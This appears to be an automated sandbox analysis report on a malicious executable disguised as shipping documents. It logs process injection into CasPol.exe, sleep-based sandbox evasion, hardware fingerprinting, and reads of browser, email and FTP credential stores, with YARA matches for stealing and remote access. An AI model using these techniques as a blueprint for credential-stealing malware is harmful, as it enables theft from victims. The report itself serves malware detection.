Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe TID: 4708 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3724 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4816 Thread sleep count: 9841 > 30 Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sys Jump to dropped file
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9841 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: CasPol.exe, 00000001.00000002.829128989.0000000006340000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06232530 LdrInitializeThunk, 1_2_06232530
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000 Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43A000 Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D1F008 Jump to behavior
Source: BL-SHIPPING DOCUMENTS.exe, kmLQrC0PWk0U/qFi2Tt7TNT.cs Reference to suspicious API methods: ('4y8gu7rkkr', 'LoadLibraryW@kernel32')
Source: 1.0.CasPol.exe.400000.0.unpack, A/C1.cs Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
Source: 1.0.CasPol.exe.400000.0.unpack, A/e2.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Queries volume information: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: Yara match File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs